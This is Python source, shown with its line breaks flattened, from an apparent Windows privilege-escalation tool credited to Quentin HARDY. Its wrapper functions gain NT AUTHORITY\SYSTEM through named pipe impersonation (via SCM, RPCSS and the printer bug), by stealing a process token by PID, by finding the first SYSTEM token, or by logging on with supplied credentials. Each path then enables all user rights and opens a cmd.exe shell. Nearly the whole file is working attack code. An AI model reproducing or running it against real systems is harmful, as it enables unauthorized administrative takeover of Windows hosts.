def scm(args): if args["toSystem"] == True: printT("Try to spawn a system shell via scm & impersonation...") esc = Escalation() imp = Impersonate() status = esc.namedPipeImpersonationSystemViaSCM(ps=True, debug=False) imp.printCurrentThreadEffectiveToken() if status == True: imp = Impersonate() imp.executeCMDWithThreadEffectiveToken()
def rpcss(args): printT("Trying to exploit 'RPCSS'...") printT("It can take many seconds, so wait...") esc = Escalation() status = esc.namedPipeImpersonationSystemViaRPCSS() if status == True: imp = Impersonate() imp.enableAllUserRights() imp.executeCMDWithThreadEffectiveToken() else: logging.error("Impossible to exploit 'RPCSS'")
def imppid(args): if args['pid'] == None: logging.error("A pid has to be selected") else: printT("Impersonating primary token of pid {0}".format(args['pid'])) imp = Impersonate() imp.enableAllUserRights() status = imp.impersonateViaPID(pid=args['pid']) if status == True: printT("Trying to open a cmd shell...") printT( "NOTICE: If not enough privileges for targeted pid, you can't open a cmd.exe shell" ) imp.printCurrentThreadEffectiveToken() imp.enableAllUserRights() imp.executeCMDWithThreadEffectiveToken() else: logging.error("Impossible to impersonate")
def searchimpfirstsystem(args): ''' Impersonate the first system token which is available and prompt a cmd.exe. :param args: :return: True if success, otherwise false ''' printT("Searching and impersonating first nt authority\\system token...") imp = Impersonate() status = imp.searchAndImpersonateFirstSystemToken(targetPID=args['pid'], printAllTokens=False) if status == True: imp.enableAllUserRights() imp.executeCMDWithThreadEffectiveToken() printT("cmd.exe prompt started as system") return True else: logging.error("Impossible to prompt a cmd.exe as system.") return False
def impuser(args): if args['username'] == None or args['password'] == None: logging.error("username or password has to be given") else: printT("Try to impersonate via creds...") imp = Impersonate() status = imp.impersonateViaCreds( login=args['username'], password=args['password'], domain=args['domain'], logonType=LOGON32_LOGON_INTERACTIVE, logonProvider=LOGON32_PROVIDER_DEFAULT) if status == True: printT("Impersonation success, try to spawn a shell...") printT( "SE_INCREASE_QUOTA_NAME and SE_ASSIGNPRIMARYTOKEN_NAME should be required" ) imp.printCurrentThreadEffectiveToken(printFull=True, printLinked=False) imp.executeCMDWithThreadEffectiveToken() else: logging.error("Impossible to impersonate via creds")
# -*- coding: UTF-8 -*- # By Quentin HARDY ([email protected]) - bobsecq import sys sys.path.append('../') from utils import * configureLogging() from escalation import Escalation from impersonate import Impersonate esc = Escalation() esc.namedPipeImpersonationSystemViaPrinterBug() imp = Impersonate() imp.enableAllUserRights() #Not necessary but we can do it, we do it imp.executeCMDWithThreadEffectiveToken()